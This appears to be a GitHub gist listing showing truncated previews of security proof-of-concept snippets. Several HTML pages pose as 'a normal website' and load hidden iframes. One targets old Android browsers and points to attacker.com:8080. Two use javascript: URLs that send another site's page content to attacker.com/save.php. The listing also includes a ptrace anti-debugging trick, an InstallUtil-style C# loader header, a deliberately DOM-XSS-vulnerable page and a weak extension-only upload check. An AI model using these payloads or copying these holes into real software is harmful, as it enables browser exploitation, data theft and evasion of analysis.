This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Compile with: | |
// clang catchredir.m -o catchredir -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ -miphoneos-version-min=7 -framework Foundation | |
#import <Foundation/Foundation.h> | |
#import <stdio.h> | |
#import <objc/runtime.h> | |
@interface UrlConnection : NSObject | |
@property (strong) NSString *url; | |
- (void)connect; | |
@end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Build on OS X with: | |
// clang debugdetect.cpp -o debugdetect -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ -miphoneos-version-min=7 | |
#import <dlfcn.h> | |
#import <sys/types.h> | |
#import <stdio.h> | |
typedef int (*ptrace_ptr_t)(int _request, pid_t _pid, caddr_t _addr, int _data); | |
void disable_dbg() { | |
ptrace_ptr_t ptrace_ptr = (ptrace_ptr_t)dlsym(RTLD_SELF, "ptrace"); | |
ptrace_ptr(31, 0, 0, 0); // PTRACE_DENY_ATTACH = 31 | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html><head><script src="Spec.js/lib/Spec.js"></script></head> | |
<body> | |
This is a normal website. Look at these pictures of cats... | |
<script> | |
var spec = new Spec(); | |
if (spec.isDeviceDetected() && spec.getOS() == "Android" | |
&& spec.getBrowser != "Chrome" | |
&& parseFloat(spec.getOSVersion()) < 4.4) { | |
var iframe = document.createElement('iframe'); | |
iframe.style.display="none"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html><head></head> | |
<body> | |
This is just a normal website... | |
<iframe id="if" name="test" height="0" width="0" src="http://www.salesforce.com"></iframe> | |
<script> | |
document.getElementById("if").style.visibility="hidden"; | |
window.open("\u0000javascript: | |
var i=new Image(); | |
i.src='http://attacker.com/save.php?'+document.body.innerHTML; | |
document.body.appendChild(i); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html><head></head> | |
<body> | |
This is just a normal website... | |
<iframe id="if" name="test" height="0" width="0" src="http://www.salesforce.com"></iframe> | |
<script> | |
document.getElementById("if").style.visibility="hidden"; | |
window.open("javascript: | |
var i=new Image(); | |
i.src='http://attacker.com/save.php?'+document.body.innerHTML; | |
document.body.appendChild(i); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html><head><script src="Spec.js/lib/Spec.js"></script></head> | |
<body> | |
<script> | |
var spec = new Spec(); | |
if (spec.isDeviceDetected() && spec.getOS() == "Android" && | |
parseFloat(spec.getOSVersion()) < 4.2) { | |
var iframe = document.createElement('iframe'); | |
iframe.style.display="none"; | |
iframe.src = "http://attacker.com:8080"; | |
document.body.appendChild(iframe); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<title>DOM XSS vulnerable page</title> | |
</head> | |
<body> | |
<script> | |
var l = decodeURI(document.location.toLocaleString().split("?")[1]); | |
document.write(l); | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$s = $_GET['s']; | |
echo '<h1>htmlentities</h1>'; | |
echo '<h1'.htmlentities($s,ENT_QUOTES).'>HELLO</h1>'; | |
echo '<h2>htmlspecialchars</h2>'; | |
echo '<h1'.htmlspecialchars($s,ENT_QUOTES).'>HELLO</h1>'; | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
function validFileType($file){ | |
if($file && $file['tmp_name'] !=''){ | |
$ext_allow_type = array('xlsx'); | |
$ext = pathinfo($file["name"], PATHINFO_EXTENSION); | |
echo "Extension is ". $ext."<br>"; | |
if(in_array($ext, $ext_allow_type) != FALSE) { | |
return true; | |
} |
OlderNewer